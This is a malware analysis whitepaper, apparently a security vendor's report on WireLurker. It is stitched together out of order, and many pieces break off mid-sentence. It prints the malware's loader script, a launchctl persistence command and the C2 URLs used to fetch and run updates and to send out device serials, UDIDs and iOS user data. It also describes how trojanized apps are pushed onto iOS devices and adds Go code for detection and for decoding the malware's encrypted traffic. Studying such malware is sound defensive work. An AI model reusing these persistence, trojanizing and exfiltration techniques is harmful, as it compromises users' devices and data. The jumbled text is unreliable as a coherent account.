Accept-Language: en, ja, fr, de, es, it, pt, pt-PT, nl, sv, nb, da, fi, ru, pl, zh-Hans, zh-Hant, ko, ar, cs, hu, tr, th, ca, hr, el, he, ro, sk, uk, en-us
Connection: keep-alive

HTTP/1.1 200 OK
Server: Tengine/2.0.0
Date: Thu, 18 Sep 2014 09:05:22 GMT
Content-Type: text/json
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9

{"result":{"version":"1","url":"http:\/\/www.comeinbaby.com\/mac\/update.zip"}}

GET /mac/update.zip HTTP/1.1
Host: www.comeinbaby.com
User-Agent: globalupdate (unknown version) CFNetwork/596.5 Darwin/12.5.0 (x86_64) (MacBookPro10%2C1)
Accept-Language: en, ja, fr, de, es
der but can still view them through the Terminal (Figure 7).

[Figure 7: Terminal listing of /Applications/CleanApp.app/Contents/MacOS (stat shows CleanApp, 31196 bytes, modified Sep 25 13:40:06 2014) beside a Finder window in which the hidden files do not appear]
FIGURE 7: WireLurker hidden files within an application bundle

These operations trojanize the original application through repackaging. After the bundle is trojanized, the malicious loader is executed when the application is run. The loader first drops an embedded script file to /Users/Shared/run.sh with the following content (the substitution placeholder is shown here as <path>):

    #!/bin/sh
    /bin/cp -rf "<path>" "<path>_2"
    /bin/cp -rf "<path>_" "<path>" && /usr/bin/open -a "<path>"
    sleep 5
    /bin/cp -rf "<path>_2" "<path>"
    rm -rf "<path>_2"
    chflags hidden "<path>"
    chflags hidden "<path>_"
    rm -f /Users/Shared/run.sh

The placeholder <path> is replaced by the full path to the application's bundle executable prior to being dropped. This effectively backs up the loader, restores the original bundle executable, runs it, restores the loader and deletes the script itself. It also sets the hidden flag again for the lo
e background
• WireLurker initialization and update scripts create and load launch daemons, ensuring persistence after reboot
• Some WireLurker executables also load launch daemons through invoking the launchctl command (Figure 12)

[Figure 12, disassembly of CheckStatus(): the function calls system("/usr/local/machook/watch.sh") and then tail-calls system() with a "/bin/launchctl load -wF /Library/Launch" command line (the string is cut off in the figure)]
FIGURE 12: Sample code for WireLurker persistence through the use of launchctl

Using these methods, there will always be at least two processes running on a WireLurker-infected OS X system: one checking for updates and another for downloading IPA files and monitoring USB connections for iOS devices to infect.

C2 Server Communication

WireLurker frequently communicates with its C2 server. To date, only one C2 server has been used: www.comeinbaby.com (124.248.245.78). This server's key roles follow:
• Hosts code updates for download
• Hosts iOS applications for download
• Processes reports on WireLurker status
• Accepts uploads of exfiltrated Mac and iOS device information
• Accepts uploads of exfiltrated iOS user data

As noted previously, WireLurker versions A and B communicate with the C2 server in plaintext over HTTP. WireLurker version C uses a custom
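The host-side artifacts described in the Bundle Repackaging and File Hiding section (an underscore-suffixed backup executable beside the loader in Contents/MacOS, and start.sh and FontMap1.cfg dropped into Contents/Resources) together with the launch daemon plists named above are what a responder would look for on a Mac. The following Go program is an added example written for this page, not the whitepaper's own detector script; the plist names, paths and file names come from the whitepaper, while the Finding type and the function names are this example's own.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

// Finding is one on-disk indicator with the reason it was flagged.
type Finding struct {
	Path   string
	Reason string
}

// launchDaemonNames are the plist names the whitepaper reports WireLurker
// registering under /Library/LaunchDaemons for persistence.
var launchDaemonNames = []string{
	"com.apple.machook_damon.plist",
	"com.apple.globalupdate.plist",
	"com.apple.MailServiceAgentHelper.plist",
}

// ScanBundle inspects one .app bundle for the repackaging traces described in
// the Bundle Repackaging section: a backup executable ending in "_" beside a
// same-named file in Contents/MacOS, and the dropped start.sh / FontMap1.cfg
// pair in Contents/Resources. The UF_HIDDEN flag is not checked here because
// it is a macOS-only stat field; on a Mac, `ls -lO` shows it.
func ScanBundle(bundle string) ([]Finding, error) {
	var found []Finding
	macos := filepath.Join(bundle, "Contents", "MacOS")
	entries, err := os.ReadDir(macos)
	if err != nil {
		return nil, err
	}
	present := make(map[string]bool, len(entries))
	for _, e := range entries {
		present[e.Name()] = true
	}
	for _, e := range entries {
		name := e.Name()
		if orig := strings.TrimSuffix(name, "_"); orig != name && present[orig] {
			found = append(found, Finding{filepath.Join(macos, name),
				"backup executable shadowed by " + orig})
		}
	}
	for _, dropped := range []string{"start.sh", "FontMap1.cfg"} {
		p := filepath.Join(bundle, "Contents", "Resources", dropped)
		if _, err := os.Stat(p); err == nil {
			found = append(found, Finding{p, "dropped repackaging file"})
		}
	}
	return found, nil
}

// ScanApplications walks a directory such as /Applications and scans every
// .app bundle found in it. Bundles without a Contents/MacOS folder are
// skipped rather than treated as errors.
func ScanApplications(root string) ([]Finding, error) {
	var all []Finding
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil {
			return err
		}
		if d.IsDir() && strings.HasSuffix(path, ".app") {
			if f, scanErr := ScanBundle(path); scanErr == nil {
				all = append(all, f...)
			}
			return filepath.SkipDir // do not descend into the bundle itself
		}
		return nil
	})
	return all, err
}

// ScanLaunchDaemons reports which of the known plist names exist in dir
// (normally /Library/LaunchDaemons).
func ScanLaunchDaemons(dir string) []Finding {
	var found []Finding
	for _, name := range launchDaemonNames {
		p := filepath.Join(dir, name)
		if _, err := os.Stat(p); err == nil {
			found = append(found, Finding{p, "launch daemon plist used for persistence"})
		}
	}
	return found
}

func main() {
	found := ScanLaunchDaemons("/Library/LaunchDaemons")
	apps, err := ScanApplications("/Applications")
	if err != nil {
		fmt.Println("scan error:", err)
	}
	for _, f := range append(found, apps...) {
		fmt.Printf("%s: %s\n", f.Path, f.Reason)
	}
}
```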
e demonstrated similar methods to attack non-jailbroken devices before; however, this malware combines a number of techniques to successfully realize a new breed of threat to all iOS devices. WireLurker exhibits complex code structure, multiple component versions, file hiding, code obfuscation and customized encryption to thwart reverse engineering. In this whitepaper we explain how WireLurker is delivered, the details of its malware progression and specifics on its operation. We further describe WireLurker's potential impact, methods to prevent, detect, contain and remediate the threat, and the Palo Alto Networks enterprise security platform protections in place to counter the associated risk.

WireLurker is capable of stealing a variety of information from the mobile devices it infects and regularly requests updates from the attackers' command and control server. This malware is under active development and its creator's ultimate goal is not yet clear.

Background

User Reporting for this Threat

Qu Chao, a developer at Tencent, initially observed WireLurker on June 1, 2014, when he found highly suspicious files and processes on his Mac and iPhone (Figure 1).

[Figure 1: screenshot of Qu Chao's Chinese-language post of June 1, 2014 describing suspicious iOS and Mac files]
[Figure 25, decompiled code: a replacement for UIWebView's webView:shouldStartLoadWithRequest:navigationType: that takes the request's URL and hands it to [[UIApplication sharedApplication] openURL:]]
FIGURE 25: Unfinished hooking code for loading URLs in the background

Self-Update

Before hooking the sendEvent method, sfbase.dylib also connects with its C2 server to check for updates. It checked in with the following URL, furnishing its current version information and the Advertising ID (ADID) of the iOS device:

http://www.comeinbaby.com/app/getversion.php?v=<version>&adid=<ad_id>

This HTTP request will return the newest version number as well as the download URL for that version. Figure 26 shows a sample check-in and its C2 server response.

[Figure 26, browser screenshot: request http://www.comeinbaby.com/app/getversion.php?v=4002&adid=whatever; response result: version 4.0.2, url http://www.comeinbaby.com/app/v4002/sfbase.dylib]
FIGURE 26: Sample check-in request and C2 server response for sfbase.dylib self-update

All of the sfbase.dylib dynamic libraries we obtained from the original Maiyadi Mac samples were version 4.0.2, which is also the latest version hosted on the
iately after they were found. WireLurker is now the only known active non-jailbroken malware threat, putting over 800 million iOS devices at risk.

The use of enterprise provisioning to install applications on non-jailbroken devices is not a new concept. This technique has been widely abused by game fans and a number of Chinese application distribution platforms. Since January 2013 there have been at least five Mac/PC tools that have abused enterprise provisioning and the libimobiledevice library to install pirated applications on non-jailbroken devices in China: PP Helper, KuaiYong Helper, 91 Mobile Helper, KuaiZhuang and SouApple. It is noteworthy that the PP Helper application is also downloaded and installed by WireLurker.

In September 2014, Tao Wei et al. presented at Virus Bulletin on the risk of abusing Apple's enterprise distribution program. According to their research, any application can bypass Apple review, arbitrarily invoke private iOS APIs, monitor user behavior and exploit vulnerabilities in a non-jailbroken iOS device by leveraging an enterprise provisioning profile. WireLurker is a prime example of how this is no longer a theoretical risk but an active threat, as seen in the wild.

Actor Motivation

The ultimate goal of the WireLurker attacks is not completely clear. The functionality and infrastructure allows
ions of code demonstrates progressive refinement:
• Version A neither downloads nor installs iOS applications to connected devices, and communicated with the C2 server in the clear (plaintext)
• Version B downloads and installs iOS applications, but only for jailbroken devices; it also communicated with its C2 server in the clear
• Version C downloads and installs iOS applications for both jailbroken and non-jailbroken devices, and incorporated a custom encryption protocol for its C2 server communication

Another significant difference between versions is found in associated malicious filenames, paths and their content. WireLurker consists of dozens of malicious files that can be grouped into the following categories:
• Original malicious samples, which were used to trojanize Mac applications
• Dropped malicious executable files and configuration files
• Downloaded update packages from the C2 server
• Locally generated database and log files
• Downloaded IPA-format iOS applications
• Malicious iOS executable files
• Malicious iOS dynamic library files

FILES GROUP            VERSION A TO B                        VERSION B TO C
Original samples       No changes                            No changes
Dropped files          Path and content changes              Path and content changes
Downloaded updates     Unknown                               Downloaded a shell script with a packed executable file
Generated files        Path and filename changes             Path and filename changes
Downloaded IPAs        Downloaded a game and a third-party   Downloaded a normal app
it, pt, pt-PT, nl, sv, nb, da, fi, ru, pl, zh-Hans, zh-Hant, ko, ar, cs, hu, tr, th, ca, hr, el, he, ro, sk, uk, en-us
Connection: keep-alive

HTTP/1.1 302 Found
Connection: close
Location: http://125.39.68.200/files/1124000004AEA39F/www.comeinbaby.com/mac/update.zip
FIGURE 9: Packet capture of WireLurker version update communication with C2 server

A sample C2 server response follows:

result: version 71, url http://www.comeinbaby.com/mac/update.zip

When the version field returns a non-zero value, WireLurker downloads the ZIP archive specified in the url field, decompresses that archive to /usr/local/machook/update and executes the enclosed start.sh script. WireLurker version B uses a different C2 server request to check for updates:

http://www.comeinbaby.com/mac/getsoft.php

In this version, the HTTP response body contains the plaintext of the start.sh script to execute, and the temporary folder from which it runs is set to /tmp/up. When we began analysis of WireLurker, its update package contained version C. The start.sh script for this version executed a newly added update binary, which:
• Drops numerous new binary executable and plist files onto the system
• Loads newly dropped plist files as launch daemons (e.g., com.apple.MailServiceAgentHelper.plist)
• Deletes executable and plist files of previous versions
• Unloads old launch daemons
ized encryption protocol (Figure 13).

[Figure 13, Wireshark dissection: a 220-byte frame from 124.248.245.78 carrying 162 bytes of TCP data, shown as hex and ASCII]
FIGURE 13: WireLurker version C customized encryption protocol for C2 communication

Reverse engineering of this encryption protocol reveals the use of the Data Encryption Standard (DES) algorithm in Electronic Codebook (ECB) mode with Cryptographic Message Syntax Standard (PKCS7) padding. For each piece of TCP data it receives or sends, the first 10 bytes of the data are used to generate a session key. The session key is then combined with a fixed string, dksyel, to generate a decryption key. The remaining bytes of the data are encrypted data that has also been encoded using Base64.
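The following Go program is an added example, not code from the whitepaper or from the malware: it decodes one version C message exactly as laid out above (10-byte prefix, key derived from the prefix plus dksyel, Base64 over DES-ECB with PKCS7 padding) using only the standard library's crypto/des. The passage does not say how the prefix becomes the session key; the example assumes it is the prefix's decimal digit sum rendered in ASCII, which makes the key exactly 8 bytes, and it includes an Encode helper and constructed sample data purely so the round trip can be checked offline.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/base64"
	"errors"
	"fmt"
)

// keySuffix is the fixed string the whitepaper names in the key derivation.
const keySuffix = "dksyel"

// deriveKey turns the 10-byte prefix of one C2 message into the 8-byte DES key.
// Assumption (not stated in the passage above): the session key is the decimal
// digit sum of the prefix rendered in ASCII, so "NN" + "dksyel" is 8 bytes.
func deriveKey(prefix []byte) ([]byte, error) {
	if len(prefix) != 10 {
		return nil, errors.New("prefix must be exactly 10 bytes")
	}
	sum := 0
	for _, c := range prefix {
		if c < '0' || c > '9' {
			return nil, fmt.Errorf("non-digit byte %q in prefix", c)
		}
		sum += int(c - '0')
	}
	key := []byte(fmt.Sprintf("%d%s", sum, keySuffix))
	if len(key) != des.BlockSize {
		// A one-digit sum would give a 7-byte key, which DES cannot use.
		return nil, fmt.Errorf("derived key is %d bytes, want %d", len(key), des.BlockSize)
	}
	return key, nil
}

// pkcs7Unpad validates and strips PKCS#7 padding.
func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%des.BlockSize != 0 {
		return nil, errors.New("data is not a whole number of DES blocks")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > des.BlockSize {
		return nil, errors.New("invalid padding length")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("invalid padding bytes")
		}
	}
	return b[:len(b)-n], nil
}

// Decode recovers the plaintext of one TCP payload laid out as
// <10-byte prefix><Base64(DES-ECB ciphertext with PKCS#7 padding)>.
func Decode(payload []byte) ([]byte, error) {
	if len(payload) < 10 {
		return nil, errors.New("payload shorter than the 10-byte prefix")
	}
	key, err := deriveKey(payload[:10])
	if err != nil {
		return nil, err
	}
	ct, err := base64.StdEncoding.DecodeString(string(payload[10:]))
	if err != nil {
		return nil, fmt.Errorf("base64: %w", err)
	}
	if len(ct) == 0 || len(ct)%des.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of DES blocks")
	}
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	for i := 0; i < len(ct); i += des.BlockSize { // ECB: each block is independent
		block.Decrypt(pt[i:i+des.BlockSize], ct[i:i+des.BlockSize])
	}
	return pkcs7Unpad(pt)
}

// Encode is the inverse of Decode. It is here only to build constructed test
// traffic offline; it is not code recovered from the malware.
func Encode(prefix, plaintext []byte) ([]byte, error) {
	key, err := deriveKey(prefix)
	if err != nil {
		return nil, err
	}
	block, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	n := des.BlockSize - len(plaintext)%des.BlockSize // PKCS#7: always pad
	padded := append(append([]byte(nil), plaintext...), bytes.Repeat([]byte{byte(n)}, n)...)
	ct := make([]byte, len(padded))
	for i := 0; i < len(padded); i += des.BlockSize {
		block.Encrypt(ct[i:i+des.BlockSize], padded[i:i+des.BlockSize])
	}
	return append(append([]byte(nil), prefix...), base64.StdEncoding.EncodeToString(ct)...), nil
}
```

Because ECB has no chaining, identical 8-byte plaintext blocks encrypt to identical ciphertext blocks, which is one reason the protocol is tractable for analysts once the key derivation is known.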
l be installed and WireLurker will have successfully compromised that non-jailbroken device. Furthermore, users are typically none the wiser, since the application otherwise operates just like the legitimate version.

[Figure 16, iOS screenshots: a dialog asking whether the user is sure they want to open the application from the developer "iPhone Distribution: Hunan Langxiong Advertising Decoration Engineering Co., Ltd." with Continue and Quit buttons, and the resulting profile entry com.manhuaba.manhuajb (received Sep 16, 2014; expires Sep 16, 2015) under Settings > General > Profiles]
FIGURE 16: WireLurker iOS confirmation dialog and subsequent enterprise provisioning

USB Connection Monitoring

WireLurker uses a popular library called libimobiledevice to interact with iOS devices through USB connections. This third-party, open source software library implements the iTunes protocol stack for communication between a computer and an iOS device [11]. WireLurker registers a callback function, usbcallback(idevice_event_t*, const void*), through the idevice_event_subscribe function provided by libimobiledevice (Figure 17).

[Figure 17, disassembly (begins): _startListen passes usbcallback (mangled as _Z11usbcallbackPK15idevice_event_tPv) and a NULL user-data pointer to idevice_event_subscribe and tests the return value]
lication before installing it. It accomplishes this by opening the IPA bundle as a ZIP archive, parsing the Info.plist file in it to get its bundle executable filename, adding an underscore to the executable filename, and copying /usr/local/machook/start (for version B) or /usr/bin/stty5.11.pl (for version C) into the bundle under the original executable filename. The start and stty5.11.pl files are very similar in terms of binary code, and their functions are discussed in more depth in the WireLurker iOS malware analysis section.

Installation of Trojanized iOS Applications

Finally, WireLurker installs trojanized applications to connected iOS devices. For a non-jailbroken device, it installs downloaded enterprise certificate-signed applications to the device. However, if the device is jailbroken, it trojanizes downloaded or backed-up applications and then installs or reinstalls them to the device. WireLurker performs each installation by uploading the trojanized IPA bundle to the iOS device through the AFC service and then leveraging the instproxy_install interface of libimobiledevice (Figure 23).

[Figure 23, disassembly (begins): afc_upload_file(afc_client, ...) is called and its result tested, after which the instproxy client and the status_cb callback are loaded into registers for the install call]
[Figure 18, disassembly (continued): repeated calls to getdeviceinfo(lockdownd_client, domain, key) for ModelNumber, ProductVersion, ProductType, AppleID (in the com.apple.itunesstored domain), UniqueDeviceID and WiFiAddress]
FIGURE 18: Code showing WireLurker collecting iOS device information

All of the collected device information is concatenated into a string that is then sent to the C2 server.

Installation of Malicious Dynamic Library to an iOS Device

After exfiltration of iOS device information, WireLurker determines the jailbroken status of the device by attempting to connect to an iOS service named AFC2 (com.apple.afc2) (Figure 19). AFC2 is an additional AFC (Apple File Connection, or Apple File Conduit) service that is part of jailbreaking utilitie
r WireLurker from our unified platform, they can block this traffic by deploying a strict policy. For host-based detection, Mac and iOS users should check processes and files on their Mac computers and iOS devices. We wrote a Python script for OS X systems to detect known malicious and suspicious files, as well as applications that exhibit characteristics of infection. This script can be downloaded from the following URL:

https://github.com/PaloAltoNetworks-BD/WireLurkerDetector

Both unified platform alerting/blocking and the output of the Python script referenced above are meant to feed into incident response efforts, supporting containment towards remediation of this threat.

Remediation

If WireLurker is found on any OS X computer, we recommend the deletion of the respective files and removal of the applications reported by the script. As of the publication date of this report, the iOS component of WireLurker is only spread through an infected Mac computer; accordingly, if WireLurker is found on a Mac, we recommend inspection of all iOS devices that have connected with that computer. A quick check for iOS devices includes determining whether any unauthorized enterprise provisioning profiles were created, by navigating to Settings > General > Profile. If an anomalous profile is found, it should be removed and a subsequent check of all applications should be performed. Delete any
rovisioning

We obtained a legal copy of the manhua application from the Apple iTunes App Store. Its legitimate bundle identifier is com.manhuaba.manhua, while the bundle identifier of the WireLurker version is com.manhuaba.manhuajb. The jb reference is most likely an abbreviation of jailbreak. Otherwise, the primary difference between the official and WireLurker versions of this application is that the former doesn't contain an embedded mobileprovision file within its bundle. The second difference is that the WireLurker binary code has not been encrypted by Apple (Figure 15).

    $ file manhua
    manhua: Mach-O universal binary with 3 architectures
    manhua (for architecture armv7):  Mach-O executable arm
    manhua (for architecture armv7s): Mach-O executable arm
    manhua (for architecture cputype 16777228 cpusubtype): Mach-O 64-bit executable
    $ lipo -thin armv7s manhua -output manhua_armv7s
    $ otool -l manhua_armv7s | grep -A4 LC_ENCRYPTION_INFO
          cmd LC_ENCRYPTION_INFO
      cmdsize 20
     cryptoff 16384
    cryptsize 262144
      cryptid 0
FIGURE 15: WireLurker applications are not encrypted by Apple

The use of enterprise provisioning explains how these applications can be installed on non-jailbroken iOS devices. Yet on the first attempt to run a WireLurker application on iOS, users are presented with a dialog requesting confirmation to open a third-party application (Figure 16). If the user chooses to continue, a third-party enterprise provisioning profile wil
s for iOS devices. The daemon process of the AFC2 service runs with root permissions, allowing the service to read, write or modify any file on the iOS file system.

[Figure 19, disassembly: lockdownd_start_service(client, "com.apple.afc2", &service) is called; if it succeeds and the returned service port is non-zero, a global flag is set to 1 and afc_client_new(device, service, &afc_client) is called]
FIGURE 19: Code for WireLurker testing whether an iOS device is jailbroken

If the AFC2 service exists on the device, WireLurker installs /usr/local/machook/sfbase.dylib (for version B) or /etc/manpath.d/libiodb.dylib (for version C) to /Library/MobileSubstrate/DynamicLibraries/sfbase.dylib on the device (Figure 20). These two files contain identical content (SHA-1 hash 461b51dd595c07f3c82be7cffc1cc77da6700605) and constitute an ARM-based Mach-O dynamic library that is a Cydia Substrate tweak. This dynamic library is discussed in more detail in the WireLurker iOS malware analysis section of this whitepaper.

[Figure 20, disassembly (begins): afc_get_file_info(afc_client, "/Library/MobileSubstrate/DynamicLibraries", ...) checks for the target folder, then the local file /etc/manpath.d/libiodb.dylib is selected for upload]
tions with WireLurker's Command and Control (C2) server and checks whether an updated version of the daemon is available. If so, it downloads an updater package and runs an enclosed shell script to update itself. Newer versions of WireLurker employ a launch daemon that downloads iOS applications signed with enterprise certificates and leverages custom encryption for C2 communication. Yet another launch daemon is responsible for attacking iOS devices connected via USB. It monitors USB connection events and, upon detecting an iOS device, ascertains its jailbreak status. This check is accomplished by trying to establish a connection with the AFC2 service on the device, which, if successful, would indicate it was jailbroken. This daemon then sends a comprehensive enumeration of device information to the C2 server.

For a non-jailbroken iOS device, WireLurker simply installs iOS applications that it downloads, leveraging iTunes protocols implemented by the libimobiledevice library. For a jailbroken iOS device, WireLurker backs up specific applications from the device to the Mac computer and trojanizes (repackages) both backed-up and additional downloaded applications with a malicious binary file. These altered iOS applications are then installed to the device through the same iTunes protocols noted above. Additionally, WireLurker uploads a malicious MobileSubstrate tweak file to the device through the AFC2 service. At this point, new application icons are visible
to the user on the connected iOS device, whether jailbroken or not. For a jailbroken device, malicious code is injected into system applications, querying all contact names, phone numbers and Apple IDs and sending them to the C2 server along with WireLurker status information.

WireLurker Versions

From April 30, 2014 through October 17, 2014, we observed three distinct versions of WireLurker. The first version (version A) consisted of the original malicious files that were used to trojanize Mac applications on Maiyadi. A week later, on May 7, 2014, the second version (version B) was distributed through WireLurker's C2 server. The v parameter of a URL found in its code supports that this is indeed the second version from the attacker's point of view (Figure 6). Then, prior to August 2014, the C2 server began distributing the third version (version C). The content of this latest updating script confirmed it was the successor of version B.

[Figure 6, disassembly: the result of GetHardwareSerialNumber() is formatted via NSString stringWithFormat: into the URL http://www.comeinbaby.com/getinsad?sn=<serial>&udid=<udid>&v=2]
FIGURE 6: WireLurker version information embedded in a URL found in binary

Examination of the differences between these three vers
utable Files

URLs for C2 Communication

The following are the HTTP URLs WireLurker used for C2 communication and their respective purpose (Data Context):
[Figure 23, disassembly (continued): instproxy_install is called with the uploaded bundle path and status_cb(const char*, const void*, void*) as its callback]
FIGURE 23: WireLurker installation of trojanized iOS applications

Analysis of WireLurker iOS Malware

WireLurker uploads a malicious dynamic library, sfbase.dylib, to an iOS device and repackages a malicious executable file, start, into the iOS application bundles that it installs. This section describes how these two files operate.

Code Injection into System Applications

The sfbase.dylib dynamic library acts as a Cydia MobileSubstrate tweak. The MobileSubstrate framework loads this dynamic library into all jailbroken iOS applications; however, this tweak focuses on the Phone, Messages, Safari, Storage Mounter, Search and Preferences system applications. On initialization, it hooks the UIWindow's sendEvent method by invoking the MSHookMessageEx API (Figure 24).

[Figure 24, decompiled code (begins): an NSAutoreleasePool is created, CFBundleExecutable is read from the main bundle's infoDictionary, and it is compared with an NSArray of target executable names (MobileSMS, MobileSafari, MobileStorageMounter, Search and others)]
Copyright 2014 Palo Alto Networks, Inc. All rights reserved. Palo Alto Networks, the Palo Alto Networks Logo, PAN-OS, App-ID and Panorama are trademarks of Palo Alto Networks, Inc. All specifications are subject to change without notice. Palo Alto Networks assumes no responsibility for any inaccuracies in this document or for any obligation to update information in this document. Palo Alto Networks reserves the right to change, modify, transfer or otherwise revise this publication without notice. PAN-WP-U42-WL-0110514